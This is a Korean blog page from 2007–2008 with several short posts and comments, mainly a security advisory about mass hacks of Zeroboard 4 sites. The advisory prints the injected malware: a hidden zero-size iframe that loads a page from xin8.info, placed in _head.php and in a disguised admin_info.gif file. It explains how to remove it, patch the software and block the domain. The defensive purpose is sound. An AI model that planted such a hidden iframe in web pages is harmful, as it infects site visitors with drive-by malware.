게시물보다 댓글이 더 위험한건 아닌가 걱정됩니다...
Posted by Parker Falcon

댓글을 달아주세요

다른 사람의 글을 마구 본다면 곤란한데 말입니다.

'Digital Life' 카테고리의 다른 글

신촌 탐앤탐스 단점  (2) 2008.10.22
많이 늘었구나..  (0) 2008.10.07
제로보드XE 도 보안상에 문제가..  (1) 2008.08.18
3년 전 자료를 찾았습니다.  (0) 2008.08.17
전자기기는 재부팅이 필수!  (0) 2008.08.09
인코딩은 어렵네  (0) 2008.08.01
Posted by Parker Falcon

댓글을 달아주세요

  1. 민수
    2008.08.19 23:35
    댓글 주소 수정/삭제 댓글
    티스토리통해서(검색하다가) 들어왔는데 말이죠;;
    보안 문제는 제로님께 메일이나 쪽지로 보내면 빠른 패치를 하시던걸로 기억합니다;;
    -XE사용자로서 왠지모를 찜찜함;;

5만 조금 덜 되게..

2008. 5. 4. 03:56
이건 별거 없는거 같은데..
그래도..

'Digital Life' 카테고리의 다른 글

zb5 이전작업 기록 #2  (0) 2008.05.06
zb5 이전작업 기록 #1  (0) 2008.05.06
5만 조금 덜 되게..  (0) 2008.05.04
11만건의 개인정보...  (0) 2008.05.01
16만 정도의 개인정보?  (0) 2008.02.19
네이버의 힘은 정말 대단하군요.  (0) 2008.02.17
Posted by Parker Falcon

댓글을 달아주세요

요즘 제로보드4에 대한 중국발 해킹이 늘어나면서
많은 홈페이지가 감염되고, 또한 사용자들도 감염되고 있습니다.


당장의 대책이라면 _head.php에

<iframe width='0' height='0' src='http://d.xin8.info/daipi/css.htm'></iframe>
이것을 제거하시구요.
그리고 images폴더 아래에 admin_info.gif파일이 있는데
이것도 제거하십시요.
파일 내용은
images/admin_info.gif
document.write("<iframe width='0' height='0' src='http://d.xin8.info/daipi/css.htm'></iframe>");

이러합니다.


그리고 이런 작업은 홈페이지 관리자만 할 수 있습니다.

관리자가 할 수 있는 것은 제로보드의 최신 패치를 업데이트 하는 것 입니다.

제가 본 사이트 대부분이 2006년 3월 15일자 패치만을 해 둔 상태인데

http://www.zeroboard.com/zb4_download/803874로 가셔서 2007년 5월 23일짜 보안 패치까지 된 pl8버전을 받으시기 바랍니다.
제로보드에서 업데이트 중에 pl의 숫자를 올리지 않아서
많은 사람들이 업데이트가 없다고 생각한 것인지는 모르겠지만
아무튼 많은 분들께서 더이상의 업데이트를 하지 않으셨습니다.

그리고 일반 사용자분들 께서 하실 수 있는 일은

인터넷 익스플로어를 사용하신다면

도구 - 인터넷 옵션 - 보안 으로 가셔서

제한된 사이트 클릭하시고 목록에 *.xin8.info 를 입력하고 추가하시기 바랍니다.

다른 브라우져 (Firefox, Opera, Safari)를 사용 하시는 분들은 상관 없지만

인터넷 익스플로어 엔진을 사용하는 브라우져를 사용하시는 분들은 똑같이 추가하시기 바랍니다.

아무튼 다들 피해 없으시기 바랍니다 :)
Posted by Parker Falcon

댓글을 달아주세요

  1. 2007.11.02 07:46 신고
    댓글 주소 수정/삭제 댓글
    제로보드에서 새로운 패치가 공개되었습니다.
    http://www.zeroboard.com/zb4_download/803874

    0.1% 더 쉽게 풀어써보았습니다.
    http://quota.tistory.com/10
  2. 2007.11.03 21:06
    댓글 주소 수정/삭제 댓글
    안녕하세요.
    Parker Falcon님, 처음뵙겠습니다.
    올려주신 포스팅 덕분에 도움을 받았습니다..
    그리고 제홈페이지에 링크도 걸었고 해서 인사남기는게 예의같아서 ^^;
    ( http://ggerzer.com/349 )
    트랙백을 쏠까하다가,, 코멘트 남겨요..

    근데, 아무래도 이번 제로보드 해킹의 파장은 일파만파 퍼져나가고 있는것 같아요.
    저도 아직까진 큰 피해를 입진않았지만, 당분간은 계속 불안한 상태가 지속될것같아요.